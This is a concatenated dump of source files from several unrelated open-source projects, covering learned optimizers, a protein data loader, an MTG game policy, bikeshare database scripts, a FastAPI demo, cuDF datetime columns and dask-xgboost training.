# Recover original shape.
return tf.reshape(transposed_output, input_shape), next_state
def initial_state_for_inputs(self, inputs, **kwargs):
"""Batch size given inputs."""
reshaped_inputs = self._reshape_inputs(inputs)
return super(KernelDeepLSTM, self).initial_state_for_inputs(
reshaped_inputs, **kwargs)
class Sgd(Network):
"""Identity network which acts like SGD."""
def __init__(self, learning_rate=0.001, name="sgd"):
"""Creates an instance of the Identity optimizer network.
Args:
learning_rate: constant learning rate to use.
name: Module name.
"""
super(Sgd, self).__init__(name=name)
self._learning_rate = learning_rate
def _build(self, inputs, _):
return -self._learning_rate * inputs, []
def initial_state_for_inputs(self, inputs, **kwargs):
return []
def _update_adam_estimate(estimate, value, b):
return (b * estimate) + ((1 - b) * value)
def _debias_adam_estimate(estimate, b, t):
return estimate / (1 - tf.pow(b, t))
class Adam(Network):
"""Adam algorithm (https://arxiv.org/pdf/1412.6980v8.pdf)."""
def __init__(self, learning_rate=1e-3, beta1=0.9, beta2=0.999, epsilon=1e-8,
name="adam"):
"""Creates an instance of Adam."""
super(Adam, self).__init__(name=name)
self._learning_rate = learning_rate
self._beta1 = beta1
self._beta2 = beta2
self._epsilon = epsilon
def _build(self, g, prev_state):
"""Connects the Adam module into the graph."""
b1 = self._beta1
b2 = self._beta2
g_shape = g.get_shape().as_list()
g = tf.reshape(g, (-1, 1))
t, m, v = prev_state
t_next = t + 1
m_next = _update_adam_estimate(m, g, b1)
m_hat = _debias_adam_estimate(m_next, b1, t_next)
v_next = _update_adam_estimate(v, tf.square(g), b2)
v_hat = _debias_adam_estimate(v_next, b2, t_next)
update = -self._learning_rate * m_hat / (tf.sqrt(v_hat) + self._epsilon)
return tf.reshape(update, g_shape), (t_next, m_next, v_next)
def initial_state_for_inputs(self, inputs, dtype=tf.float32, **kwargs):
batch_size = int(np.prod(inputs.get_shape().as_list()))
t = tf.zeros((), dtype=dtype)
m = tf.zeros((batch_size, 1), dtype=dtype)
v = tf.zeros((batch_size, 1), dtype=dtype)
return (t, m, v)
```
#### File: L2O-Swarm/src/dataloader.py
```python
import numpy as np
#import pdb
def data_loader():
scoor_init=[]
sq=[]
se=[]
sr=[]
sbasis=[]
seval=[]
protein_list = np.loadtxt("train_list", dtype='str')
for i in range(len(protein_list)):
#if(i+1 ==len(protein_list)):
# n=9
#else:
# n=6
n=6
for j in range(1,n):
x = np.loadtxt("data/"+protein_list[i]+'_'+str(j)+"/coor_init")
q = np.loadtxt("data/"+protein_list[i]+'_'+str(j)+"/q")
e = np.loadtxt("data/"+protein_list[i]+'_'+str(j)+"/e")
r = np.loadtxt("data/"+protein_list[i]+'_'+str(j)+"/r")
basis = np.loadtxt("data/"+protein_list[i]+'_'+str(j)+"/basis")
eigval = np.loadtxt("data/"+protein_list[i]+'_'+str(j)+"/eigval")
#print (x.shape, q.shape, e.shape, r.shape, basis.shape, eigval.shape)
q=np.tile(q, (1, 1))
e=np.tile(e, (1,1))
q = np.matmul(q.T, q)
e = np.sqrt(np.matmul(e.T, e))
r = (np.tile(r, (len(r), 1)) + np.tile(r, (len(r), 1)).T)/2
scoor_init.append(x)
sq.append(q)
se.append(e)
sr.append(r)
sbasis.append(basis)
seval.append(eigval)
scoor_init = np.array(scoor_init)
sq = np.array(sq)
se = np.array(se)
sr = np.array(sr)
sbasis = np.array(sbasis)
seval = np.array(seval)
print (sq.shape, se.shape, seval.shape)
return scoor_init, sq, se, sr, sbasis, seval
if __name__ == "__main__":
data_loader()
```
#### File: L2O-Swarm/src/get_12basis.py
```python
import numpy as np
import os
path_protein_benchmark = "/home/cyppsp/project_bayesian/zdock/2c/"
protein_list = np.loadtxt("temp", dtype='str')
def c_normal_mode_analysis(protein, rpath, lpath, output):
os.system("cp "+rpath+" /home/cyppsp/cNMA/Example/Example1/Input/"+protein+'_r_u.pdb')
os.system("cp "+lpath+" /home/cyppsp/cNMA/Example/Example1/Input/"+protein+'_l_u.pdb')
os.system("/home/cyppsp/cNMA/Example/Example1/run_example1.sh "+protein)
os.system("cp /home/cyppsp/cNMA/Example/Example1/basis data/"+output)
os.system("cp /home/cyppsp/cNMA/Example/Example1/eigval data/"+output)
for i in range(len(protein_list)):
# ligand file
for j in range(1, 11):
os.system("mkdir data/"+protein_list[i]+'_'+str(j))
rpath="/home/cyppsp/project_bayesian/zdock/2c/"+protein_list[i]+"_r_u.pdb.ms"
lpath="/home/cyppsp/project_bayesian/zdock/2c/"+protein_list[i]+"_l_u_"+str(j)+".pdb"
c_normal_mode_analysis(protein_list[i], rpath, lpath, protein_list[i]+'_'+str(j))
``` |
{
"source": "JohnZ60/MTGMulligan",
"score": 3
} |
#### File: JohnZ60/MTGMulligan/random_policy.py
```python
import math
import random as random
def perform_random_main_phase_action(player, game):
passed = False
playable_indices = player.get_playable_cards()
callable_permanents, ability_indices = player.get_activated_abilities(game)
action_count = len(ability_indices) + len(playable_indices)
if action_count > 0:
tap_chance = (len(ability_indices) / float(action_count))
if random.random() < 0.01 or action_count == 0:
passed = True
elif random.random() > tap_chance:
player.play_card(playable_indices[0], game)
# pay randomly the generic mana cost of the card
while player.generic_debt > 0:
eligible_colors = player.get_nonempty_mana_colors()
player.pay_generic_debt(eligible_colors[random.randint(0, len(eligible_colors) - 1)])
else:
callable_permanents[0].use_tapped_ability(0)
return passed
def declare_random_attackers(player, game):
eligible_attackers = player.get_eligible_attackers(game)
attackers = []
for creature in eligible_attackers:
if random.random() < 0.5:
creature.is_attacking.append(creature.owner.get_opponent(game))
attackers.append(creature)
return attackers
def declare_random_blockers(player, attackers, game):
eligible_blockers = player.get_eligible_blockers(game)
blockers = []
for creature in eligible_blockers:
if random.random() < 0.5:
attacker_index = random.randint(0, len(attackers) - 1)
blocked_attacker = attackers[attacker_index]
creature.is_blocking.append(blocked_attacker)
blocked_attacker.is_blocked_by.append(creature)
blockers.append(creature)
return blockers
def assign_random_damage_assignment_orders(player, attackers, game):
for attacker in attackers:
order = math.factorial(len(attacker.is_blocked_by))
random_order = random.randint(0, order)
attacker.set_damage_assignment_order(random_order - 1)
def assign_damage_randomly(player, attacker):
for i in range(len(attacker.damage_assignment_order)):
blocker_i = attacker.damage_assignment_order[i]
remaining_health = blocker_i.toughness - blocker_i.damage_taken
if attacker.damage_to_assign < remaining_health or i == len(attacker.damage_assignment_order) - 1:
attacker.assign_damage(i, attacker.damage_to_assign)
break
else:
random_damage = random.randint(remaining_health, attacker.damage_to_assign)
attacker.assign_damage(i, random_damage)
if attacker.damage_to_assign == 0:
break
# delete these functions!
``` |
{
"source": "john-z-cheng/bikeshare",
"score": 3
} |
#### File: john-z-cheng/bikeshare/calculateStats.py
```python
import argparse
import psycopg2
import sys
import itertools
import statistics
import logging
logging.basicConfig(level=logging.DEBUG, format='%(levelname)s - %(message)s')
def get_existing_trip_pairs(conn, member_type, minimum):
"""get existing trip_pairs based on member_type and a minimum
quantity of trips. The member_type values are:
Both, Casual, Registered"""
query = """SELECT tp.start_id, tp.stop_id, tp.distance,
tq.quantity, tq.trip_pair_id
FROM trip_pairs tp, trip_quantity tq
WHERE tp.id = tq.trip_pair_id AND tq.member_type=%s
AND tq.quantity > %s"""
with conn:
with conn.cursor() as cur:
params = (member_type, minimum)
cur.execute(query, params)
rows = cur.fetchall()
return rows
def calculate_stats(member_type, minimum):
try:
conn = psycopg2.connect(dbname='gisdb', user='gisuser',
password='<PASSWORD>')
except:
print("Cannot connect to database")
sys.exit(1)
queryAll = """SELECT duration FROM trips
WHERE start_id=%s and stop_id=%s"""
queryByType = """SELECT duration FROM trips t, member_types m
WHERE start_id=%s and stop_id=%s AND
t.member_type_id=m.id AND m.type IN %s"""
pairList = get_existing_trip_pairs(conn, member_type, minimum)
logging.debug(len(pairList))
# convert the member_type to appropriate tuple for IN clause
if member_type == 'Both':
mType= ('Casual','Registered')
else:
mType = (member_type,)
with conn.cursor() as qCur:
for pair in pairList:
(start_id, stop_id, distance, quantity, pair_id) = pair
logging.debug((start_id, stop_id))
params = (start_id, stop_id, mType)
qCur.execute(queryByType, params)
rows = qCur.fetchall()
data = list(itertools.chain(*rows))
# calculate the stats
median = statistics.median(data)
# create the execute cursor
with conn.cursor() as eCur:
stmt = """DELETE FROM trip_stats WHERE trip_pair_id=%s
and conditions=%s"""
eParams = (pair_id, member_type)
eCur.execute(stmt, eParams)
stmt = """INSERT INTO trip_stats
(trip_pair_id, sample_size, conditions,
stat_name, stat_value) VALUES (%s, %s, %s, %s, %s)"""
eParams = (pair_id, quantity, member_type, 'median', median)
eCur.execute(stmt, eParams)
conn.commit()
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('--type', dest='member_type', default='Both', choices=['Both','Casual','Registered'], help='specify member type')
parser.add_argument('--minimum', type=int, default=400)
args = parser.parse_args()
calculate_stats(args.member_type, args.minimum)
```
#### File: john-z-cheng/bikeshare/createPostgresCopyData.py
```python
import psycopg2
import sys
import csv
import logging
logging.basicConfig(level=logging.DEBUG, format='%(levelname)s - %(message)s')
def createMemberDict(conn):
"""build a dictionary of memberType IDs from database"""
memberDict = {}
with conn:
with conn.cursor() as cur:
cur.execute("SELECT id, type FROM member_types")
rows = cur.fetchall()
for row in rows:
(memberId, typeName) = row
memberDict[typeName] = memberId
return memberDict
def createDataFromCsv(inFile, outFile):
dataFile = open(outFile, 'w', newline='')
writer = csv.writer(dataFile,delimiter='\t')
reader = csv.reader(open(inFile,newline=''),delimiter=',')
# skip header row, but make sure it has 9 columns
header = next(reader)
if len(header) != 9:
print("Unexpected format")
print(header)
sys.exit(1)
# Sample CSV line in 9 column format
"""
Duration (ms),Start date,End date,Start station number,
Start station,End station number,End station,Bike #, Member type
257866,7/1/2015 0:00,7/1/2015 0:04,31116,California St & Florida Ave NW,31117,15th & Euclid St NW,W21516,Registered
"""
# only care about duration, times, stations, bike, and member type
try:
conn = psycopg2.connect(dbname='gisdb', user='gisuser',
password='<PASSWORD>')
except:
print("Cannot connect to database")
sys.exit(1)
memberDict = createMemberDict(conn)
line = 0
for row in reader:
(duration, start_date, stop_date,
start_station, start_station_name,
stop_station, stop_station_name,
bike, member_type) = row
bikeId = bike[1:] # drop leading letter W
memberId = memberDict[member_type]
outRow = [duration, start_date, stop_date, start_station, stop_station, bikeId, memberId]
writer.writerow(outRow)
if line % 10000 == 0:
logging.debug(row)
line += 1
dataFile.close()
return
if __name__ == "__main__":
try:
inFile = sys.argv[1]
except:
inFile = "trips.csv"
try:
outFile = sys.argv[2]
except:
outFile = "data.csv"
createDataFromCsv(inFile, outFile)
``` |
{
"source": "johnzech/self-destruct",
"score": 3
} |
#### File: self-destruct/example_api/example_api.py
```python
import sys
from typing import List, Optional
from fastapi import FastAPI, HTTPException
from pydantic import BaseModel
sys.path.append('..')
from utils.db import simple_query, delete_row, insert_row, update_row
tags_metadata = [
{
"name": "entrees",
"description": "Operations with entrees.",
},
]
app = FastAPI(
title="Bento API",
description="An example api built with FastAPI and Hypercorn",
version="1.0.0",
openapi_tags=tags_metadata
)
class NewEntree(BaseModel):
entree_name:str
class Entree(NewEntree):
entree_id:int
@app.get("/")
async def root():
return {"Hello": "World"}
@app.post('/entrees', response_model=Entree, status_code=201, tags=["entrees"])
async def create_entree(entree: NewEntree):
"""
Create an entree
- **entree_name**: each entree must have a name
"""
entree_id = insert_row("INSERT INTO test.entree (entree_name) VALUES (:entree_name) RETURNING entree_id", entree.dict())
return Entree(entree_id=entree_id, entree_name=entree.entree_name)
@app.get('/entrees', response_model=List[Entree], tags=["entrees"])
async def get_entrees():
"""
Get all of the entrees
"""
rows = simple_query('SELECT * FROM test.entree')
return rows
@app.get('/entree/<entree_id>', response_model=Entree, tags=["entrees"])
async def get_entree(entree_id):
"""
Get an entree by id
- **entree_id**: the unique id of the entree
"""
rows = simple_query('SELECT * FROM test.entree WHERE entree_id = :entree_id', {'entree_id': entree_id})
if (len(rows) == 0):
raise HTTPException(status_code=404, detail="Entree {} doesn't exist".format(entree_id))
else:
return rows[0]
@app.delete('/entree/<entree_id>', status_code=204, tags=["entrees"])
async def delete_entree(entree_id):
"""
Delete an entree
- **entree_id**: the unique id of the entree
"""
rowcount = delete_row('DELETE FROM test.entree WHERE entree_id = :entree_id', {'entree_id': entree_id})
if rowcount == 0:
raise HTTPException(status_code=404, detail="Entree {} doesn't exist".format(entree_id))
else:
return ''
@app.put('/entree/<entree_id>', response_model=Entree, status_code=201, tags=["entrees"])
async def update_entree(entree_id:int, entree: Entree):
"""
Update an entree
- **entree_id**: the unique id of the entree
- **entree_name**: update the name of the entree
"""
rowcount = update_row("UPDATE test.entree SET entree_name = :entree_name WHERE entree_id = :entree_id", entree.dict())
if (rowcount == 0):
raise HTTPException(status_code=404, detail="Entree {} doesn't exist".format(entree_id))
else:
return entree
``` |
{
"source": "JohnZed/cudf",
"score": 3
} |
#### File: core/column/datetime.py
```python
import datetime as dt
import numpy as np
import pandas as pd
import pyarrow as pa
import cudf._lib as libcudf
from cudf._lib.nvtx import annotate
from cudf.core.buffer import Buffer
from cudf.core.column import column
from cudf.utils import utils
from cudf.utils.dtypes import is_scalar, np_to_pa_dtype
# nanoseconds per time_unit
_numpy_to_pandas_conversion = {
"ns": 1,
"us": 1000,
"ms": 1000000,
"s": 1000000000,
"m": 60000000000,
"h": 3600000000000,
"D": 1000000000 * 86400,
}
class DatetimeColumn(column.ColumnBase):
def __init__(
self, data, dtype, mask=None, size=None, offset=0, null_count=None
):
"""
Parameters
----------
data : Buffer
The datetime values
dtype : np.dtype
The data type
mask : Buffer; optional
The validity mask
"""
dtype = np.dtype(dtype)
if data.size % dtype.itemsize:
raise ValueError("Buffer size must be divisible by element size")
if size is None:
size = data.size // dtype.itemsize
size = size - offset
super().__init__(
data,
size=size,
dtype=dtype,
mask=mask,
offset=offset,
null_count=null_count,
)
assert self.dtype.type is np.datetime64
self._time_unit, _ = np.datetime_data(self.dtype)
def __contains__(self, item):
# Handles improper item types
try:
item = np.datetime64(item, self._time_unit)
except Exception:
return False
return item.astype("int_") in self.as_numerical
@property
def time_unit(self):
return self._time_unit
@property
def year(self):
return self.get_dt_field("year")
@property
def month(self):
return self.get_dt_field("month")
@property
def day(self):
return self.get_dt_field("day")
@property
def hour(self):
return self.get_dt_field("hour")
@property
def minute(self):
return self.get_dt_field("minute")
@property
def second(self):
return self.get_dt_field("second")
@property
def weekday(self):
return self.get_dt_field("weekday")
def get_dt_field(self, field):
return libcudf.datetime.extract_datetime_component(self, field)
def normalize_binop_value(self, other):
if isinstance(other, dt.datetime):
other = np.datetime64(other)
if isinstance(other, pd.Timestamp):
m = _numpy_to_pandas_conversion[self.time_unit]
ary = utils.scalar_broadcast_to(
other.value * m, size=len(self), dtype=self.dtype
)
elif isinstance(other, np.datetime64):
other = other.astype(self.dtype)
ary = utils.scalar_broadcast_to(
other, size=len(self), dtype=self.dtype
)
else:
raise TypeError("cannot broadcast {}".format(type(other)))
return column.build_column(data=Buffer(ary), dtype=self.dtype)
@property
def as_numerical(self):
from cudf.core.column import build_column
return build_column(
data=self.base_data,
dtype=np.int64,
mask=self.base_mask,
offset=self.offset,
size=self.size,
)
def as_datetime_column(self, dtype, **kwargs):
dtype = np.dtype(dtype)
if dtype == self.dtype:
return self
return libcudf.unary.cast(self, dtype=dtype)
def as_numerical_column(self, dtype, **kwargs):
return self.as_numerical.astype(dtype)
def as_string_column(self, dtype, **kwargs):
from cudf.core.column import string
if len(self) > 0:
return string._numeric_to_str_typecast_functions[
np.dtype(self.dtype)
](self, **kwargs)
else:
return column.column_empty(0, dtype="object", masked=False)
def to_pandas(self, index=None):
return pd.Series(
self.to_array(fillna="pandas").astype(self.dtype), index=index
)
def to_arrow(self):
mask = None
if self.nullable:
mask = pa.py_buffer(self.mask_array_view.copy_to_host())
data = pa.py_buffer(self.as_numerical.data_array_view.copy_to_host())
pa_dtype = np_to_pa_dtype(self.dtype)
return pa.Array.from_buffers(
type=pa_dtype,
length=len(self),
buffers=[mask, data],
null_count=self.null_count,
)
def default_na_value(self):
"""Returns the default NA value for this column
"""
dkind = self.dtype.kind
if dkind == "M":
return np.datetime64("nat", self.time_unit)
else:
raise TypeError(
"datetime column of {} has no NaN value".format(self.dtype)
)
def binary_operator(self, op, rhs, reflect=False):
lhs, rhs = self, rhs
if op in ("eq", "ne", "lt", "gt", "le", "ge"):
out_dtype = np.bool
else:
raise TypeError(
f"Series of dtype {self.dtype} cannot perform "
f" the operation {op}"
)
return binop(lhs, rhs, op=op, out_dtype=out_dtype)
def fillna(self, fill_value):
if is_scalar(fill_value):
fill_value = np.datetime64(fill_value, self.time_unit)
else:
fill_value = column.as_column(fill_value, nan_as_null=False)
result = libcudf.replace.replace_nulls(self, fill_value)
result = column.build_column(
result.base_data,
result.dtype,
mask=None,
offset=result.offset,
size=result.size,
)
return result
def min(self, dtype=None):
return libcudf.reduce.reduce("min", self, dtype=dtype)
def max(self, dtype=None):
return libcudf.reduce.reduce("max", self, dtype=dtype)
def find_first_value(self, value, closest=False):
"""
Returns offset of first value that matches
"""
value = pd.to_datetime(value)
value = column.as_column(value).as_numerical[0]
return self.as_numerical.find_first_value(value, closest=closest)
def find_last_value(self, value, closest=False):
"""
Returns offset of last value that matches
"""
value = pd.to_datetime(value)
value = column.as_column(value).as_numerical[0]
return self.as_numerical.find_last_value(value, closest=closest)
@property
def is_unique(self):
return self.as_numerical.is_unique
def can_cast_safely(self, to_dtype):
if np.issubdtype(to_dtype, np.datetime64):
to_res, _ = np.datetime_data(to_dtype)
self_res, _ = np.datetime_data(self.dtype)
max_int = np.iinfo(np.dtype("int64")).max
max_dist = self.max().astype(np.timedelta64, copy=False)
min_dist = self.min().astype(np.timedelta64, copy=False)
self_delta_dtype = np.timedelta64(0, self_res).dtype
if max_dist <= np.timedelta64(max_int, to_res).astype(
self_delta_dtype
) and min_dist <= np.timedelta64(max_int, to_res).astype(
self_delta_dtype
):
return True
else:
return False
elif to_dtype == np.dtype("int64") or to_dtype == np.dtype("O"):
# can safely cast to representation, or string
return True
else:
return False
@annotate("BINARY_OP", color="orange", domain="cudf_python")
def binop(lhs, rhs, op, out_dtype):
out = libcudf.binaryop.binaryop(lhs, rhs, op, out_dtype)
return out
def infer_format(element, **kwargs):
"""
Infers datetime format from a string, also takes cares for `ms` and `ns`
"""
import re
fmt = pd.core.tools.datetimes._guess_datetime_format(element, **kwargs)
if fmt is not None:
return fmt
element_parts = element.split(".")
if len(element_parts) != 2:
raise ValueError("Unable to infer the timestamp format from the data")
# There is possibility that the element is of following format
# '00:00:03.333333 2016-01-01'
second_part = re.split(r"(\D+)", element_parts[1], maxsplit=1)
subsecond_fmt = ".%" + str(len(second_part[0])) + "f"
first_part = pd.core.tools.datetimes._guess_datetime_format(
element_parts[0], **kwargs
)
# For the case where first_part is '00:00:03'
if first_part is None:
tmp = "1970-01-01 " + element_parts[0]
first_part = pd.core.tools.datetimes._guess_datetime_format(
tmp, **kwargs
).split(" ", 1)[1]
if first_part is None:
raise ValueError("Unable to infer the timestamp format from the data")
if len(second_part) > 1:
second_part = pd.core.tools.datetimes._guess_datetime_format(
"".join(second_part[1:]), **kwargs
)
else:
second_part = ""
try:
fmt = first_part + subsecond_fmt + second_part
except Exception:
raise ValueError("Unable to infer the timestamp format from the data")
return fmt
```
#### File: cudf/tests/test_text.py
```python
import pytest
from pandas.util.testing import assert_series_equal
import cudf
def test_tokenize():
strings = cudf.Series(
[
"the quick fox jumped over the lazy dog",
"the siamรฉsรฉ cat jumped under the sofa",
None,
"",
]
)
expected = cudf.Series(
[
"the",
"quick",
"fox",
"jumped",
"over",
"the",
"lazy",
"dog",
"the",
"siamรฉsรฉ",
"cat",
"jumped",
"under",
"the",
"sofa",
]
)
actual = strings.str.tokenize()
assert type(expected) == type(actual)
assert_series_equal(expected.to_pandas(), actual.to_pandas())
@pytest.mark.parametrize(
"delimiter, expected_token_counts",
[
("", [10, 9, 0, 0, 5]),
("o", [6, 3, 0, 0, 1]),
(["a", "e", "i", "o", "u"], [13, 13, 0, 0, 6]),
(["a", "e", "i", "o"], [12, 11, 0, 0, 6]),
],
)
def test_token_count(delimiter, expected_token_counts):
strings = cudf.Series(
[
"the quick brown fox jumped over the lazy brown dog",
"the sable siamรฉsรฉ cat jumped under the brown sofa",
None,
"",
"test_str\x01test_str\x02test_str\x03test_str\x04test_str\x05",
]
)
expected = cudf.Series(expected_token_counts)
actual = strings.str.token_count(delimiter)
assert type(expected) == type(actual)
assert_series_equal(
expected.to_pandas(), actual.to_pandas(), check_dtype=False
)
def test_normalize_spaces():
strings = cudf.Series(
[
" the\t quick fox jumped over the lazy dog",
"the siamรฉsรฉ cat\f jumped\t\tunder the sofa ",
None,
"",
]
)
expected = cudf.Series(
[
"the quick fox jumped over the lazy dog",
"the siamรฉsรฉ cat jumped under the sofa",
None,
"",
]
)
actual = strings.str.normalize_spaces()
assert type(expected) == type(actual)
assert_series_equal(expected.to_pandas(), actual.to_pandas())
@pytest.mark.parametrize(
"n, separator, expected_values",
[
(
2,
"_",
[
"this_is",
"is_my",
"my_favorite",
"favorite_book",
"book_on",
"on_my",
"my_bookshelf",
],
),
(
3,
"-",
[
"this-is-my",
"is-my-favorite",
"my-favorite-book",
"favorite-book-on",
"book-on-my",
"on-my-bookshelf",
],
),
],
)
def test_ngrams(n, separator, expected_values):
strings = cudf.Series(
["this", "is", "my", "favorite", "book", "on", "my", "bookshelf"]
)
expected = cudf.Series(expected_values)
actual = strings.str.ngrams(n=n, separator=separator)
assert type(expected) == type(actual)
assert_series_equal(expected.to_pandas(), actual.to_pandas())
@pytest.mark.parametrize(
"n, separator, expected_values",
[
(
2,
"_",
[
"this_is",
"is_my",
"my_favorite",
"book_on",
"on_my",
"my_bookshelf",
],
),
(
3,
"-",
["this-is-my", "is-my-favorite", "book-on-my", "on-my-bookshelf"],
),
],
)
def test_ngrams_tokenize(n, separator, expected_values):
strings = cudf.Series(["this is my favorite", "book on my bookshelf"])
expected = cudf.Series(expected_values)
actual = strings.str.ngrams_tokenize(n=n, separator=separator)
assert type(expected) == type(actual)
assert_series_equal(expected.to_pandas(), actual.to_pandas())
``` |
{
"source": "JohnZed/dask-xgboost",
"score": 2
} |
#### File: dask-xgboost/dask_xgboost/core.py
```python
from collections import defaultdict
import logging
from threading import Thread
import time
import numpy as np
import pandas as pd
import cudf as gd
from toolz import first, assoc
from tornado import gen
try:
import sparse
import scipy.sparse as ss
except ImportError:
sparse = False
ss = False
from dask import delayed
from dask.delayed import Delayed, delayed
from dask.base import tokenize, normalize_token, DaskMethodsMixin
from dask.utils import funcname, M, OperatorMethodMixin
from dask.context import _globals
from dask.core import flatten
from dask.threaded import get as threaded_get
from dask.optimization import cull, fuse
from toolz import merge, partition_all
from dask.distributed import wait, default_client
import dask.dataframe as dd
import dask.array as da
import dask_cudf as dgd
import xgboost as xgb
from .tracker import RabitTracker
logger = logging.getLogger(__name__)
def parse_host_port(address):
if '://' in address:
address = address.rsplit('://', 1)[1]
host, port = address.split(':')
port = int(port)
return host, port
def start_tracker(host, n_workers):
""" Start Rabit tracker """
env = {'DMLC_NUM_WORKER': n_workers}
rabit = RabitTracker(hostIP=host, nslave=n_workers)
env.update(rabit.slave_envs())
rabit.start(n_workers)
logger.info("Starting Rabit Tracker")
thread = Thread(target=rabit.join)
thread.daemon = True
thread.start()
return env
def concat(L):
if isinstance(L[0], np.ndarray):
return np.concatenate(L, axis=0)
elif isinstance(L[0], (pd.DataFrame, pd.Series)):
return pd.concat(L, axis=0)
elif isinstance(L[0], (gd.DataFrame, gd.Series)):
return gd.concat(L)
elif isinstance(L[0], xgb.DMatrix):
return
elif ss and isinstance(L[0], ss.spmatrix):
return ss.vstack(L, format='csr')
elif sparse and isinstance(L[0], sparse.SparseArray):
return sparse.concatenate(L, axis=0)
else:
raise TypeError("Data must be either numpy arrays or pandas dataframes"
". Got %s" % type(L[0]))
def train_part(env, param, list_of_parts, dmatrix_kwargs=None, **kwargs):
"""
Run part of XGBoost distributed workload
This starts an xgboost.rabit slave, trains on provided data, and then shuts
down the xgboost.rabit slave
Returns
-------
models found by each worker
"""
data, labels = zip(*list_of_parts) # Prepare data
if labels[0] is not None:
data = concat(data) # Concatenate many parts into one
labels = concat(labels)
if dmatrix_kwargs is None:
dmatrix_kwargs = {}
dtrain = xgb.DMatrix(data, labels, **dmatrix_kwargs)
elif labels[0] is None and isinstance(data[0], xgb.DMatrix):
dtrain = data[0]
if dmatrix_kwargs is None:
dmatrix_kwargs = {}
elif labels[0] is None and isinstance(data[0], gd.DataFrame):
data = concat(data)
if dmatrix_kwargs is None:
dmatrix_kwargs = {}
dtrain = xgb.DMatrix(data, **dmatrix_kwargs)
args = [('%s=%s' % item).encode() for item in env.items()]
xgb.rabit.init(args)
try:
logger.info("Starting Rabit, Rank %d", xgb.rabit.get_rank())
bst = xgb.train(param, dtrain, **kwargs)
result = bst
if xgb.rabit.get_rank() > 0 and not param.get('dask_all_models', False):
result = None
finally:
xgb.rabit.finalize()
return result
@gen.coroutine
def _train(client, params, data, labels, dmatrix_kwargs={}, **kwargs):
"""
Asynchronous version of train
See Also
--------
train
"""
# Break apart Dask.array/dataframe into chunks/parts
data_parts = None
label_parts = None
if isinstance(data, (list, tuple)):
if isinstance(data[0], Delayed):
for data_part in data:
if not isinstance(data_part, Delayed):
raise AssertionError("not all data is delayed")
data_parts = data
else:
data_parts = data.to_delayed()
if labels is not None:
label_parts = labels.to_delayed()
if isinstance(data_parts, np.ndarray):
assert data_parts.shape[1] == 1
data_parts = data_parts.flatten().tolist()
if isinstance(label_parts, np.ndarray):
assert label_parts.ndim == 1 or label_parts.shape[1] == 1
label_parts = label_parts.flatten().tolist()
# Arrange parts into pairs. This enforces co-locality
if labels is not None:
parts = list(map(delayed, zip(data_parts, label_parts)))
parts = client.compute(parts) # Start computation in the background
yield wait(parts)
else:
parts = list(map(delayed, zip(data_parts, [None]*len(data_parts))))
parts = client.compute(parts)
yield wait(parts)
for part in parts:
if part.status == 'error':
yield part # trigger error locally
# Because XGBoost-python doesn't yet allow iterative training, we need to
# find the locations of all chunks and map them to particular Dask workers
key_to_part_dict = dict([(part.key, part) for part in parts])
who_has = yield client.scheduler.who_has(keys=[part.key for part in parts])
worker_map = defaultdict(list)
for key, workers in who_has.items():
worker_map[first(workers)].append(key_to_part_dict[key])
ncores = yield client.scheduler.ncores() # Number of cores per worker
# Start the XGBoost tracker on the Dask scheduler
host, port = parse_host_port(client.scheduler.address)
env = yield client._run_on_scheduler(start_tracker,
host.strip('/:'),
len(worker_map))
# Tell each worker to train on the chunks/parts that it has locally
futures = [client.submit(train_part, env,
assoc(params, 'nthread', ncores[worker]),
list_of_parts, workers=worker,
dmatrix_kwargs=dmatrix_kwargs, **kwargs)
for worker, list_of_parts in worker_map.items()]
# Get the results, only one will be non-None
results = yield client._gather(futures)
result = [v for v in results if v]
if not params.get('dask_all_models', False):
result = result[0]
num_class = params.get('num_class')
if num_class:
result.set_attr(num_class=str(num_class))
raise gen.Return(result)
def train(client, params, data, labels, dmatrix_kwargs={}, **kwargs):
""" Train an XGBoost model on a Dask Cluster
This starts XGBoost on all Dask workers, moves input data to those workers,
and then calls ``xgboost.train`` on the inputs.
Parameters
----------
client: dask.distributed.Client
params: dict
Parameters to give to XGBoost (see xgb.Booster.train)
data: dask array or dask.dataframe
labels: dask.array or dask.dataframe
dmatrix_kwargs: Keywords to give to Xgboost DMatrix
**kwargs: Keywords to give to XGBoost train
Examples
--------
>>> client = Client('scheduler-address:8786') # doctest: +SKIP
>>> data = dd.read_csv('s3://...') # doctest: +SKIP
>>> labels = data['outcome'] # doctest: +SKIP
>>> del data['outcome'] # doctest: +SKIP
>>> train(client, params, data, labels, **normal_kwargs) # doctest: +SKIP
<xgboost.core.Booster object at ...>
See Also
--------
predict
"""
return client.sync(_train, client, params, data,
labels, dmatrix_kwargs, **kwargs)
def _predict_part(part, model=None):
xgb.rabit.init()
try:
dm = xgb.DMatrix(part)
result = model.predict(dm)
finally:
xgb.rabit.finalize()
if isinstance(part, pd.DataFrame):
if model.attr("num_class"):
result = pd.DataFrame(result, index=part.index)
else:
result = pd.Series(result, index=part.index, name='predictions')
if isinstance(part, gd.DataFrame):
if model.attr("num_class"):
result = gd.DataFrame(result, index=part.index)
else:
result = gd.Series(result, index=part.index)
return result
def predict(client, model, data):
""" Distributed prediction with XGBoost
Parameters
----------
client: dask.distributed.Client
model: xgboost.Booster
data: dask array or dataframe
Examples
--------
>>> client = Client('scheduler-address:8786') # doctest: +SKIP
>>> test_data = dd.read_csv('s3://...') # doctest: +SKIP
>>> model
<xgboost.core.Booster object at ...>
>>> predictions = predict(client, model, test_data) # doctest: +SKIP
Returns
-------
Dask.dataframe or dask.array, depending on the input data type
See Also
--------
train
"""
if isinstance(data, dgd.core._Frame):
result = data.map_partitions(_predict_part, model=model)
elif isinstance(data, dd._Frame):
result = data.map_partitions(_predict_part, model=model)
result = result.values
elif isinstance(data, da.Array):
num_class = model.attr("num_class") or 2
num_class = int(num_class)
if num_class > 2:
kwargs = dict(
drop_axis=None,
chunks=(data.chunks[0], (num_class,)),
)
else:
kwargs = dict(
drop_axis=1,
)
result = data.map_blocks(_predict_part, model=model,
dtype=np.float32,
**kwargs)
return result
class DaskRegressionMixin:
def fit(self, X, y=None):
"""Fit the gradient boosting model
Parameters
----------
X : array-like [n_samples, n_features]
y : array-like
Returns
-------
self : the fitted Regressor
Notes
-----
This differs from the XGBoost version not supporting the ``eval_set``,
``eval_metric``, ``early_stopping_rounds`` and ``verbose`` fit
kwargs.
"""
client = default_client()
xgb_options = self.get_xgb_params()
self._Booster = train(client, xgb_options, X, y,
num_boost_round=self.get_num_boosting_rounds())
return self
def predict(self, X):
client = default_client()
return predict(client, self._Booster, X)
